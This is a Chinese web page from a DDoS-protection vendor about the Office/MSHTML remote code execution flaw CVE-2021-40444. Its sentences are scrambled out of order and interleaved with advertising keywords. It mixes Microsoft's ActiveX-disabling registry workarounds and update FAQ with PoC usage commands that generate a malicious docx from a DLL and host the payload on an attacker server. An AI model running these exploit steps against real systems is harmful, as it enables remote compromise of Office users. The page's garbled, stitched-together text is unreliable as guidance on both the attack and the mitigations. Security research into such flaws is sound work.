微软Office Word远程代码执行漏洞|CVE-2021-40444-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!

QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 微软Office Word远程代码执行漏洞|CVE-2021-40444

微软Office Word远程代码执行漏洞|CVE-2021-40444

小墨安全管家 2021-09-24 15:15 CC防护 89 ℃
DDoS防御

如需经过组策略禁用 ActiveX 控件。

双击您在变通办法步骤二中创建的 .reg 文件。

怎么撤消变通办法

生成恶意 docx(将位于out/)后,CC防御,您能够设置服务器:

我们建议将此设置应用至所有区域,以充分爱护您的系统。

此足本的创建基于对野外使用的示例的一些逆向工程:

漏洞描述

双击名称并在编辑字符串对话框中,删除“数值数据”。

变通办法的阻碍。

如需在所有区域的 Internet Explorer 中禁用安装 ActiveX 控件,将以下内容粘贴到文本文件中,DDoS防御,并使用 .reg 文件扩展名举行保存:

在注册表编辑器中,导航至合适的注册表项:

HKEY_CLASSES_ROOT.rtf\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 

CVE-2021-40444(Microsoft Office Word 远程代码执行)恶意 docx 生成器利用工具 .

完成此调查后,Microsoft 将采取有助于爱护客户的适当措施。这大概包括,DDoS防御,经过月度公布流程提供安全更新程序,或依照客户需求不定期提供安全更新程序。

禁用 Shell Preview 可防止用户在 Windows Explorer 中预览文档。针对您想防止预览的各类文档,请执行以下步骤:

项目地址:

关于 Word 文档:

最终在 Windows 虚拟机中尝试 docx:打开 word 成功弹出计算器.

微软Office Word远程代码执行漏洞|CVE-2021-40444

用户将无法在 Windows Explorer 中预览文档。

Windows 7、Windows Server 2008 R2 和 Windows Server 2008 的月度汇总中包含此漏洞的更新。应用月度汇总的客户无需再应用 IE 累积更新。

我运行的是 Windows 7、Windows Server 2008 R2 或 Windows Server 2008。我需要应用月度汇总和 IE 累积更新吗?

微软Office Word远程代码执行漏洞|CVE-2021-40444

这可将所有 64 位和 32 位进程的 Internet 区域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 设置为禁用 (3)。 新的 ActiveX 控件将不大概安装。之前安装的 ActiveX 控件将然后运行。

警告假如您不正确地使用注册表编辑器,则大概会导致严峻咨询题(您兴许需要重新安装操作系统)。Microsoft 不保证您能够解决因错误使用注册表编辑器而产生的咨询题。使用注册表编辑器的风险由您自个儿承担。

请参阅缓解措施和解决想法部分,以了解有关爱护您的系统免受此漏洞阻碍之措施的重要信息。

微软Office Word远程代码执行漏洞|CVE-2021-40444

关于每个区域:

sudo python3 exploit.py host 80

双击下载签名的 ActiveX 控件并启用政策。接着将政策中的选项设置为停用。

重新启动系统,以确保应用新配置。

微软Office Word远程代码执行漏洞|CVE-2021-40444

Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]"1001"=dword:00000003"1004"=dword:00000003 

挑选区域(Internet 区域、Intranet 区域、本地计算机区域或受信任的站点区域)。

更新 2021 年 9 月 14 日:Microsoft 已公布安全更新来解决此漏洞。有关适用于您系统的更新,请参阅“安全更新”表。我们建议您即将安装这些更新。请参阅常见咨询题解答,CC防御,以了解适用于您系统的重要信息。

攻击者可制作一具由托管扫瞄器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。接着,攻击者必须诱使用户打开此恶意文件。在系统上配置为具有较少用户权限的用户帐户比具有治理员权限的用户帐户所受阻碍要小。

导出 RegKey 的副本以备份。

运行 Windows 8.1、Windows Server 2012 R2 或 Windows Server 2012 的客户可应用下列选项之一:月度汇总或仅安全更新和 IE 累积更新。

在组策略设置中,导航到计算机配置 > 治理模板 > Windows 组件 > Internet Explorer > Internet 操纵面板 > 安全页面

常见咨询题解答

首先生成一具给定 DLL 的恶意 docx 文档,您能够使用从调用中test/calc.dll弹出 a 的这个calc.exesystem ()

在 Internet Explorer 中禁用所有 ActiveX 控件能够缓解这种攻击。这能够经过使用“本地组策略编辑器”配置组策略或更新注册表在所有站点中实现。之前安装的 ActiveX 控件将然后运行,然而不大概受此漏洞的阻碍。

变通办法的阻碍。

这可将所有 64 位和 32 位进程的 Internet 区域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 设置为禁用 (3)。 新的 ActiveX 控件将不大概安装。之前安装的 ActiveX 控件将然后运行。

检查REPRODUCE.md手动复制步骤

CVE-2021-40444 PoC

“安全更新”表中列有适用于 Windows 8.1、Windows Server 2012 R2 和 Windows Server 2012 的三类更新。我需要在我的系统中安装啥更新来免受此漏洞的阻碍?

Microsoft 正在调查 MSHTML 中一具阻碍 Microsoft Windows 的远程代码执行漏洞的报告。Microsoft 发觉,存在尝试经过非常设计的 Microsoft Office 文档利用此漏洞的针对性攻击。

只应用仅安全更新的客户还需要应用 IE 累积更新,以免受此漏洞的阻碍。

938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)

你需要先安装 lcab ( sudo apt-get install lcab)

Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供检测和防范已知漏洞的功能。客户应将反恶意软件产品保持最新状态。使用自动更新的客户不需要采取其他措施。治理更新的企业客户应当挑选检测版本 1.349.22.0 或更新版本,以将其部署于整个用户环境中。Microsoft Defender for Endpoint 警报将显示为:“Suspicious Cpl File Execution”。

假如您生成的 cab 不起作用,请尝试将 exploit.html URL 指向 calc.cab

python3 exploit.py generate test/calc.dll http://<SRV IP> 

使用想法

如需在单个系统中经过 RegKey 禁用 ActiveX 控件:


DDoS防御

当前位置:主页 > CC防护 > 微软Office Word远程代码执行漏洞|CVE-2021-40444

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119